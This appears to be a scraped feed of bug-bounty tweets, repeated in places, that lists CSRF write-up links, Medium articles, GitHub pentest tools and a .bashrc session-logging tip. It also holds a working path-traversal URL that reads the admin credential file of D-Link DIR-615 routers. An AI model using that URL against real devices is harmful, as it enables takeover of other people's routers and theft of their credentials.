#CSRF
https://t.co/nRmV2rltyu
https://t.co/ETHFuz2Oq5
https://t.co/DL26Ngm4Bj
https://t.co/EVShJTb7Xy
https://t.co/NK2NTxZEyP
https://t.co/kWrLyNSJEh
https://t.co/2PLIzQbeRr
https://t.co/OolLUkJ02h
https://t.co/pw8pfXKzwN
https://t.co/Nc5vQV0ZlK
#bugbounty,#bugbountytips
https://t.co/nRmV2rltyu
https://t.co/ETHFuz2Oq5
https://t.co/DL26Ngm4Bj
https://t.co/EVShJTb7Xy
https://t.co/NK2NTxZEyP
https://t.co/kWrLyNSJEh
https://t.co/2PLIzQbeRr
https://t.co/OolLUkJ02h
https://t.co/pw8pfXKzwN
https://t.co/Nc5vQV0ZlK
#bugbounty,#bugbountytips
Blogspot
Site wide CSRF on a popular program
How I found site wide CSRF bug by a trick that I learned on Twitter
LFI for Dlink DIR-615 Fw 7.19 (Malaysia version, EOL reached - but still online).
Read ADMIN credentials of remote front-end:
http://<DIR-615 IP>:8080/model/__lang_msg.php?MY_MSG_FILE=../../../var/etc/httpasswd
Read ADMIN credentials of remote front-end:
http://<DIR-615 IP>:8080/model/__lang_msg.php?MY_MSG_FILE=../../../var/etc/httpasswd
Mastering the Skills of Bug Bounty
https://medium.com/swlh/mastering-the-skills-of-bug-bounty-2201eb6a9f4
From Recon to Optimizing RCE Results
https://medium.com/bugbountywriteup/from-recon-to-optimizing-rce-results-simple-story-with-one-of-the-biggest-ict-company-in-the-ea710bca487a
Exploiting WebSocket
https://medium.com/@osamaavvan/exploiting-websocket-application-wide-xss-csrf-66e9e2ac8dfa
Top 10 Operating Systems for Ethical Hackers
https://medium.com/the-lotus-fruit/top-10-operating-systems-for-ethical-hackers-and-penetration-testers-2020-list-b523b611cdbb
#BugBounty
https://medium.com/swlh/mastering-the-skills-of-bug-bounty-2201eb6a9f4
From Recon to Optimizing RCE Results
https://medium.com/bugbountywriteup/from-recon-to-optimizing-rce-results-simple-story-with-one-of-the-biggest-ict-company-in-the-ea710bca487a
Exploiting WebSocket
https://medium.com/@osamaavvan/exploiting-websocket-application-wide-xss-csrf-66e9e2ac8dfa
Top 10 Operating Systems for Ethical Hackers
https://medium.com/the-lotus-fruit/top-10-operating-systems-for-ethical-hackers-and-penetration-testers-2020-list-b523b611cdbb
#BugBounty
Medium
Mastering the Skills of Bug Bounty
Your syllabus for going from newbie to top hacker
#PentestTools
Osmedeus
https://github.com/j3ssie/Osmedeus
lscript
https://github.com/arismelachroinos/lscript
Raccoon
https://github.com/evyatarmeged/Raccoon
xssor2
https://github.com/evilcos/xssor2
SSRF-Testing
https://github.com/cujanovic/SSRF-Testing
EggShell
https://github.com/neoneggplant/EggShell
dirmap
https://github.com/H4ckForJob/dirmap
#bugbounty,#CyberSecurity
Osmedeus
https://github.com/j3ssie/Osmedeus
lscript
https://github.com/arismelachroinos/lscript
Raccoon
https://github.com/evyatarmeged/Raccoon
xssor2
https://github.com/evilcos/xssor2
SSRF-Testing
https://github.com/cujanovic/SSRF-Testing
EggShell
https://github.com/neoneggplant/EggShell
dirmap
https://github.com/H4ckForJob/dirmap
#bugbounty,#CyberSecurity
GitHub
GitHub - j3ssie/osmedeus: A Workflow Engine for Offensive Security
A Workflow Engine for Offensive Security. Contribute to j3ssie/osmedeus development by creating an account on GitHub.
For pentesting, Add this to your .bashrc file:
PS1='[
test "$(ps -ocommand= -p $PPID | awk '{print $1}')" == 'script' || (script -f $HOME/logs/$(date +"%d-%b-%y_%H-%M-%S")_shell.log)
Now you can have a log of everything you did and when you did it.
PS1='[
date +"%d-%b-%y %T"
] > ' test "$(ps -ocommand= -p $PPID | awk '{print $1}')" == 'script' || (script -f $HOME/logs/$(date +"%d-%b-%y_%H-%M-%S")_shell.log)
Now you can have a log of everything you did and when you did it.